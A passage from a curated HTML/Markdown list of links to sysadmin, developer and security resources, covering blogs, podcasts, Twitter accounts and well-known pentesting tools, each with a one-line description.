sqlite clone from scratch in C.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://djhworld.github.io/post/2019/05/21/i-dont-know-how-cpus-work-so-i-simulated-one-in-code/"><b>simple-computer</b></a> - great resource to understand how computers work under the hood.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.troyhunt.com/working-with-154-million-records-on/"><b>The story of "Have I been pwned?"</b></a> - working with 154 million records on Azure Table Storage.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.top500.org/"><b>TOP500 Supercomputers</b></a> - shows the 500 most powerful commercially available computer systems known to us.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.shellntel.com/blog/2017/2/8/how-to-build-a-8-gpu-password-cracker"><b>How to build a 8 GPU password cracker</b></a> - any "black magic" or hours of frustration like desktop components do.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://home.cern/science/computing"><b>CERN Data Centre</b></a> - 3D visualizations of the CERN computing environments (and more).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://howfuckedismydatabase.com/"><b>How fucked is my database</b></a> - evaluate how fucked your database is with this handy website.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://krisbuytaert.be/blog/linux-troubleshooting-101-2016-edition/index.html"><b>Linux Troubleshooting 101 , 2016 Edition</b></a> - everything is a DNS Problem...<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://open.buffer.com/5-whys-process/"><b>Five Whys</b></a> - you know what the problem is, but you cannot solve it?<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gvnshtn.com/maersk-me-notpetya/"><b>Maersk, me & notPetya</b></a> - how did ransomware successfully hijack hundreds of domain controllers?<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://howhttps.works/"><b>howhttps.works</b></a> - how HTTPS works ...in a comic!<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://howdns.works/"><b>howdns.works</b></a> - a fun and colorful explanation of how DNS works.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://postgresqlco.nf/en/doc/param/"><b>POSTGRESQLCO.NF</b></a> - your postgresql.conf documentation and recommendations.<br> </p> #### Inspiring Lists &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: SysOps/DevOps <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/kahun/awesome-sysadmin"><b>Awesome Sysadmin</b></a> - amazingly awesome open source sysadmin resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/alebcay/awesome-shell"><b>Awesome Shell</b></a> - awesome command-line frameworks, toolkits, guides and gizmos.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/learnbyexample/Command-line-text-processing"><b>Command-line-text-processing</b></a> - finding text to search and replace, sorting to beautifying, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/caesar0301/awesome-pcaptools"><b>Awesome Pcaptools</b></a> - collection of tools developed by other researchers to process network traces.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/zoidbergwill/awesome-ebpf"><b>awesome-ebpf</b></a> - a curated list of awesome projects related to eBPF.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/leandromoreira/linux-network-performance-parameters"><b>Linux Network Performance</b></a> - where some of the network sysctl variables fit into the Linux/Kernel network flow.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dhamaniasad/awesome-postgres"><b>Awesome Postgres</b></a> - list of awesome PostgreSQL software, libraries, tools and resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/enochtangg/quick-SQL-cheatsheet"><b>quick-SQL-cheatsheet</b></a> - a quick reminder of all SQL queries and examples on how to use them.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Kickball/awesome-selfhosted"><b>Awesome-Selfhosted</b></a> - list of Free Software network services and web applications which can be hosted locally.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wiki.archlinux.org/index.php/List_of_applications"><b>List of applications</b></a> - huge list of apps sorted by category, as a reference for those looking for packages.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/InterviewMap/CS-Interview-Knowledge-Map"><b>CS-Interview-Knowledge-Map</b></a> - build the best interview map.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Tikam02/DevOps-Guide"><b>DevOps-Guide</b></a> - DevOps Guide from basic to advanced with Interview Questions and Notes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://issue.freebsdfoundation.org/publication/?m=33057&l=1&view=issuelistBrowser"><b>FreeBSD Journal</b></a> - it is a great list of periodical magazines about FreeBSD and other important things.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/bregman-arie/devops-interview-questions"><b>devops-interview-questions</b></a> - contains interview questions on various DevOps and SRE related topics.<br></p> ##### :black_small_square: Developers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/kamranahmedse/developer-roadmap"><b>Web Developer Roadmap</b></a> - roadmaps, articles and resources to help you choose your path, learn and improve.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/thedaviddias/Front-End-Checklist"><b>Front-End-Checklist</b></a> - the perfect Front-End Checklist for modern websites and meticulous developers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/thedaviddias/Front-End-Performance-Checklist"><b>Front-End-Performance-Checklist</b></a> - the only Front-End Performance Checklist that runs faster than the others.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://rszalski.github.io/magicmethods/"><b>Python's Magic Methods</b></a> - what are magic methods? They're everything in object-oriented Python.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/satwikkansal/wtfpython"><b>wtfpython</b></a> - a collection of surprising Python snippets and lesser-known features.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/twhite96/js-dev-reads"><b>js-dev-reads</b></a> - a list of books and articles for the discerning web developer to read.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/RomuloOliveira/commit-messages-guide"><b>Commit messages guide</b></a> - a guide to understand the importance of commit messages.<br> </p> ##### :black_small_square: Security/Pentesting <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/qazbnm456/awesome-web-security"><b>Awesome Web Security</b></a> - a curated list of Web Security materials and resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/joe-shenouda/awesome-cyber-skills"><b>awesome-cyber-skills</b></a> - a curated list of hacking environments where you can train your cyber skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/devsecops/awesome-devsecops"><b>awesome-devsecops</b></a> - an authoritative list of awesome devsecops tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jivoi/awesome-osint"><b>awesome-osint</b></a> - is a curated list of amazingly awesome OSINT.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/hslatman/awesome-threat-intelligence"><b>awesome-threat-intelligence</b></a> - a curated list of Awesome Threat Intelligence resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/infosecn1nja/Red-Teaming-Toolkit"><b>Red-Teaming-Toolkit</b></a> - a collection of open source and commercial tools that aid in red team operations.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/snoopysecurity/awesome-burp-extensions"><b>awesome-burp-extensions</b></a> - a curated list of amazingly awesome Burp Extensions.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Hack-with-Github/Free-Security-eBooks"><b>Free Security eBooks</b></a> - list of a Free Security and Hacking eBooks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/yeahhub/Hacking-Security-Ebooks"><b>Hacking-Security-Ebooks</b></a> - top 100 Hacking & Security E-Books.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/nikitavoloboev/privacy-respecting"><b>privacy-respecting</b></a> - curated list of privacy respecting services and software.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/wtsxDev/reverse-engineering"><b>reverse-engineering</b></a> - list of awesome reverse engineering resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/michalmalik/linux-re-101"><b>linux-re-101</b></a> - a collection of resources for linux reverse engineering.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/onethawt/reverseengineering-reading-list"><b>reverseengineering-reading-list</b></a> - a list of Reverse Engineering articles, books, and papers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/0xInfection/Awesome-WAF"><b>Awesome-WAF</b></a> - a curated list of awesome web-app firewall (WAF) stuff.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jakejarvis/awesome-shodan-queries"><b>awesome-shodan-queries</b></a> - interesting, funny, and depressing search queries to plug into shodan.io.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/danielmiessler/RobotsDisallowed"><b>RobotsDisallowed</b></a> - a curated list of the most common and most interesting robots.txt disallowed directories.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Kayzaks/HackingNeuralNetworks"><b>HackingNeuralNetworks</b></a> - is a small course on exploiting and defending neural networks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gist.github.com/joepie91/7e5cad8c0726fd6a5e90360a754fc568"><b>wildcard-certificates</b></a> - why you probably shouldn't use a wildcard certificate.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gist.github.com/joepie91/5a9909939e6ce7d09e29"><b>Don't use VPN services</b></a> - which is what every third-party "VPN provider" does.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/InQuest/awesome-yara"><b>awesome-yara</b></a> - a curated list of awesome YARA rules, tools, and people.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/drduh/macOS-Security-and-Privacy-Guide"><b>macOS-Security-and-Privacy-Guide</b></a> - guide to securing and improving privacy on macOS.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/PaulSec/awesome-sec-talks"><b>awesome-sec-talks</b></a> - is a collected list of awesome security talks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/k4m4/movies-for-hackers"><b>Movies for Hackers</b></a> - list of movies every hacker & cyberpunk must watch.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/danieldizzy/Cryptography_1"><b>Cryptography_1</b></a> - materials used whilst taking Prof. Dan Boneh Stanford Crypto course.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/ashutosh1206/Crypton"><b>Crypton</b></a> - library to learn and practice Offensive and Defensive Cryptography.<br> </p> ##### :black_small_square: Other <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.cheatography.com/"><b>Cheatography</b></a> - over 3,000 free cheat sheets, revision aids and quick references.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mre/awesome-static-analysis"><b>awesome-static-analysis</b></a> - static analysis tools for all programming languages.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/ossu/computer-science"><b>computer-science</b></a> - path to a free self-taught education in Computer Science.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/danluu/post-mortems"><b>post-mortems</b></a> - is a collection of postmortems (config errors, hardware failures, and more).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/danistefanovic/build-your-own-x"><b>build-your-own-x</b></a> - build your own (insert technology here).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rby90/Project-Based-Tutorials-in-C"><b>Project-Based-Tutorials-in-C</b></a> - is a curated list of project-based tutorials in C.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/kylelobo/The-Documentation-Compendium"><b>The-Documentation-Compendium</b></a> - various README templates & tips on writing high-quality documentation.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mahmoud/awesome-python-applications"><b>awesome-python-applications</b></a> - free software that works great, and also happens to be open-source Python.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/awesomedata/awesome-public-datasets"><b>awesome-public-datasets</b></a> - a topic-centric list of HQ open datasets.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Sahith02/machine-learning-algorithms"><b>machine-learning-algorithms</b></a> - a curated list of all machine learning algorithms and concepts.<br> </p> #### Blogs/Podcasts/Videos &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: SysOps/DevOps <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/watch?v=nAFpkV5-vuI"><b>Varnish for PHP developers</b></a> - very interesting presentation of Varnish by Mattias Geniar.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/watch?v=CZ3wIuvmHeM"><b>A Netflix Guide to Microservices</b></a> - alks about the chaotic and vibrant world of microservices at Netflix.<br> </p> ##### :black_small_square: Developers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/watch?v=yOyaJXpAYZQ"><b>Comparing C to machine lang</b></a> - compare a simple C app with the compiled machine code of that program.<br> </p> ##### :black_small_square: Geeky Persons <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.brendangregg.com/"><b>Brendan Gregg's Blog</b></a> - is an industry expert in computing performance and cloud computing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gynvael.coldwind.pl/"><b>Gynvael "GynDream" Coldwind</b></a> - is a IT security engineer at Google.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://lcamtuf.coredump.cx/"><b>Michaล‚ "lcamtuf" Zalewski</b></a> - white hat hacker, computer security expert.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ma.ttias.be/"><b>Mattias Geniar</b></a> - developer, sysadmin, blogger, podcaster and public speaker.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nickcraver.com/"><b>Nick Craver</b></a> - software developer and systems administrator for Stack Exchange.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://scotthelme.co.uk/"><b>Scott Helme</b></a> - security researcher, international speaker and founder of securityheaders.com and report-uri.com.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://krebsonsecurity.com/"><b>Brian Krebs</b></a> - The Washington Post and now an Independent investigative journalist.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.schneier.com/"><b>Bruce Schneier</b></a> - is an internationally renowned security technologist, called a "security guru".<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://chrissymorgan.co.uk/"><b>Chrissy Morgan</b></a> - advocate of practical learning, Chrissy also takes part in bug bounty programs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://blog.zsec.uk/"><b>Andy Gill</b></a> - is a hacker at heart who works as a senior penetration tester.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://danielmiessler.com/"><b>Daniel Miessler</b></a> - cybersecurity expert and writer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://samy.pl/"><b>Samy Kamkar</b></a> - is an American privacy and security researcher, computer hacker.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.j4vv4d.com/"><b>Javvad Malik</b></a> - is a security advocate at AlienVault, a blogger event speaker and industry commentator.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.grahamcluley.com/"><b>Graham Cluley</b></a> - public speaker and independent computer security analyst.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://security.szurek.pl/"><b>Kacper Szurek</b></a> - detection engineer at ESET.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.troyhunt.com/"><b>Troy Hunt</b></a> - web security expert known for public education and outreach on security topics.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://raymii.org/s/index.html"><b>raymii.org</b></a> - sysadmin specializing in building high availability cloud environments.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://robert.penz.name/"><b>Robert Penz</b></a> - IT security expert.<br> </p> ##### :black_small_square: Geeky Blogs <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://linux-audit.com/"><b>Linux Audit</b></a> - the Linux security blog about auditing, hardening and compliance by Michael Boelen.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://linuxsecurity.expert/"><b> Linux Security Expert</b></a> - trainings, howtos, checklists, security tools, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.grymoire.com/"><b>The Grymoire</b></a> - collection of useful incantations for wizards, be you computer wizards, magicians, or whatever.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.secjuice.com"><b>Secjuice</b></a> - is the only non-profit, independent and volunteer led publication in the information security space.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://duo.com/decipher"><b>Decipher</b></a> - security news that informs and inspires.<br> </p> ##### :black_small_square: Geeky Vendor Blogs <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.tenable.com/podcast"><b>Tenable Podcast</b></a> - conversations and interviews related to Cyber Exposure, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nakedsecurity.sophos.com/"><b>Sophos</b></a> - threat news room, giving you news, opinion, advice and research on computer security issues.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.tripwire.com/state-of-security/"><b>Tripwire State of Security</b></a> - blog featuring the latest news, trends and insights on current security issues.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://blog.malwarebytes.com/"><b>Malwarebytes Labs Blog</b></a> - security blog aims to provide insider news about cybersecurity.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.trustedsec.com/category/articles/"><b>TrustedSec</b></a> - latest news, and trends about cybersecurity.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://portswigger.net/blog"><b>PortSwigger Web Security Blog</b></a> - about web app security vulns and top tips from our team of web security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.alienvault.com/blogs"><b>AT&T Cybersecurity blog</b></a> - news on emerging threats and practical advice to simplify threat detection.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://thycotic.com/company/blog/"><b>Thycotic</b></a> - where CISOs and IT Admins come to learn about industry trends, IT security, and more.<br> </p> ##### :black_small_square: Geeky Cybersecurity Podcasts <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://risky.biz/netcasts/risky-business/"><b>Risky Business</b></a> - is a weekly information security podcast featuring news and in-depth interviews.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.vice.com/en_us/topic/cyber"><b>Cyber, by Motherboard</b></a> - stories, and focus on the ideas about cybersecurity.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.tenable.com/podcast"><b>Tenable Podcast</b></a> - conversations and interviews related to Cyber Exposure, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://podcasts.apple.com/gb/podcast/cybercrime-investigations/id1428801405"><b> Cybercrime Investigations</b></a> - podcast by Geoff White about cybercrimes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://themanyhats.club/tag/episodes/"><b>The many hats club</b></a> - featuring stories from a wide range of Infosec people (Whitehat, Greyhat and Blackhat).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://darknetdiaries.com/"><b>Darknet Diaries</b></a> - true stories from the dark side of the Internet.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/playlist?list=PL423I_gHbWUXah3dmt_q_XNp0NlGAKjis"><b>OSINTCurious Webcasts</b></a> - is the investigative curiosity that helps people be successful in OSINT.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/user/SecurityWeeklyTV"><b>Security Weekly</b></a> - the latest information security and hacking news.<br> </p> ##### :black_small_square: Geeky Cybersecurity Video Blogs <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/channel/UCzvJStjySZVvOBsPl-Vgj0g"><b>rev3rse security</b></a> - offensive, binary exploitation, web app security, vulnerability, hardening, red team, blue team.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w"><b>LiveOverflow</b></a> - a lot more advanced topics than what is typically offered in paid online courses - but for free.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/infoseccynic"><b>J4vv4D</b></a> - the important information regarding our internet security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cybertalks.co.uk/"><b> CyberTalks</b></a> - talks, interviews, and article about cybersecurity.<br> </p> ##### :black_small_square: Best Personal Twitter Accounts <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/blackroomsec"><b>@blackroomsec</b></a> - a white-hat hacker/pentester. Intergalactic Minesweeper Champion 1990.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/MarcoCiappelli"><b>@MarcoCiappelli</b></a> - Co-Founder @ITSPmagazine, at the intersection of IT security and society.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/binitamshah"><b>@binitamshah</b></a> - Linux Evangelist. Malwares. Kernel Dev. Security Enthusiast.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/joe_carson"><b>@joe_carson</b></a> - an InfoSec Professional and Tech Geek.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/mikko"><b>@mikko</b></a> - CRO at F-Secure, Reverse Engineer, TED Speaker, Supervillain.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/esrtweet"><b>@esrtweet</b></a> - often referred to as ESR, is an American software developer, and open-source software advocate.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/gynvael"><b>@gynvael</b></a> - security researcher/programmer, @DragonSectorCTF founder/player, technical streamer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/x0rz"><b>@x0rz</b></a> - Security Researcher & Cyber Observer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/hasherezade"><b>@hasherezade</b></a> - programmer, malware analyst. Author of PEbear, PEsieve, libPeConv.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/TinkerSec"><b>@TinkerSec</b></a> - tinkerer, cypherpunk, hacker.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/alisaesage"><b>@alisaesage</b></a> - independent hacker and researcher.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/SwiftOnSecurity"><b>@SwiftOnSecurity</b></a> - systems security, industrial safety, sysadmin, author of decentsecurity.com.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/dakami"><b>@dakami</b></a> - is one of just seven people with the authority to restore the DNS root keys.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/samykamkar"><b>@samykamkar</b></a> - is a famous "grey hat" hacker, security researcher, creator of the MySpace "Samy" worm.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/securityweekly"><b>@securityweekly</b></a> - founder & CTO of Security Weekly podcast network.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/jack_daniel"><b>@jack_daniel</b></a> - @SecurityBSides co-founder.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/thegrugq"><b>@thegrugq</b></a> - Security Researcher.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/matthew_d_green"><b>@matthew_d_green</b></a> - a cryptographer and professor at Johns Hopkins University.<br> </p> ##### :black_small_square: Best Commercial Twitter Accounts <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/haveibeenpwned"><b>@haveibeenpwned</b></a> - check if you have an account that has been compromised in a data breach.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/bugcrowd"><b>@bugcrowd</b></a> - trusted by more of the Fortune 500 than any other crowdsourced security platform.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/Malwarebytes"><b>@Malwarebytes</b></a> - most trusted security company. Unmatched threat visibility.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/sansforensics"><b>@sansforensics</b></a> - the world's leading Digital Forensics and Incident Response provider.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/attcyber"><b>@attcyber</b></a> - AT&T Cybersecurityโ€™s Edge-to-Edge technologies provide threat intelligence, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/TheManyHatsClub"><b>@TheManyHatsClub</b></a> - an information security focused podcast and group of individuals from all walks of life.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/hedgehogsec"><b>@hedgehogsec</b></a> - Hedgehog Cyber. Gibraltar and Manchester's top boutique information security firm.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/NCSC"><b>@NCSC</b></a> - the National Cyber Security Centre. Helping to make the UK the safest place to live and work online.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/Synacktiv"><b>@Synacktiv</b></a> - IT security experts.<br> </p> ##### :black_small_square: A piece of history <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://ftp.arl.army.mil/~mike/howto/"><b>How to Do Things at ARL</b></a> - how to configure modems, scan images, record CD-ROMs, and other.<b>*</b><br> </p> ##### :black_small_square: Other <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/watch?v=3QnD2c4Xovk"><b>Diffie-Hellman Key Exchange (short version)</b></a> - how Diffie-Hellman Key Exchange worked.<br> </p> #### Hacking/Penetration Testing &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Pentesters arsenal tools <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.syhunt.com/sandcat/"><b>Sandcat Browser</b></a> - a penetration-oriented browser with plenty of advanced functionality already built in.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.metasploit.com/"><b>Metasploit</b></a> - tool and framework for pentesting system, web and many more, contains a lot a ready to use exploit.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://portswigger.net/burp"><b>Burp Suite</b></a> - tool for testing web app security, intercepting proxy to replay, inject, scan and fuzz HTTP requests.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project"><b>OWASP Zed Attack Proxy</b></a> - intercepting proxy to replay, inject, scan and fuzz HTTP requests.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://w3af.org/"><b>w3af</b></a> - is a Web Application Attack and Audit Framework.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://mitmproxy.org/"><b>mitmproxy</b></a> - an interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cirt.net/Nikto2"><b>Nikto2</b></a> - web server scanner which performs comprehensive tests against web servers for multiple items.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://sqlmap.org/"><b>sqlmap</b></a> - tool that automates the process of detecting and exploiting SQL injection flaws.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/lanmaster53/recon-ng"><b>Recon-ng</b></a> - is a full-featured Web Reconnaissance framework written in Python.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Tib3rius/AutoRecon"><b>AutoRecon</b></a> - is a network reconnaissance tool which performs automated enumeration of services.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.faradaysec.com/"><b>Faraday</b></a> - an Integrated Multiuser Pentest Environment.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/s0md3v/Photon"><b>Photon</b></a> - incredibly fast crawler designed for OSINT.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/s0md3v/XSStrike"><b>XSStrike</b></a> - most advanced XSS detection suite.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/1N3/Sn1per"><b>Sn1per</b></a> - automated pentest framework for offensive security experts.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/future-architect/vuls"><b>vuls</b></a> - is an agent-less vulnerability scanner for Linux, FreeBSD, and other.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/google/tsunami-security-scanner"><b>tsunami</b></a> - is a general purpose network security scanner with an extensible plugin system.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/michenriksen/aquatone"><b>aquatone</b></a> - a tool for domain flyovers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/GitHackTools/BillCipher"><b>BillCipher</b></a> - information gathering tool for a website or IP address.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Ekultek/WhatWaf"><b>WhatWaf</b></a> - detect and bypass web application firewalls and protection systems.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/s0md3v/Corsy"><b>Corsy</b></a> - CORS misconfiguration scanner.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/evyatarmeged/Raccoon"><b>Raccoon</b></a> - is a high performance offensive security tool for reconnaissance and vulnerability scanning.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Nekmo/dirhunt"><b>dirhunt</b></a> - find web directories without bruteforce.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.openwall.com/john/"><b>John The Ripper</b></a> - is a fast password cracker, currently available for many flavors of Unix, Windows, and other.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hashcat.net/hashcat/"><b>hashcat</b></a> - world's fastest and most advanced password recovery utility.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://lcamtuf.coredump.cx/p0f3/"><b>p0f</b></a> - is a tool to identify the players behind any incidental TCP/IP communications.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mozilla/ssh_scan"><b>ssh_scan</b></a> - a prototype SSH configuration and policy scanner.<br> &nbsp;&nbsp;:small_orange_diamond: <a 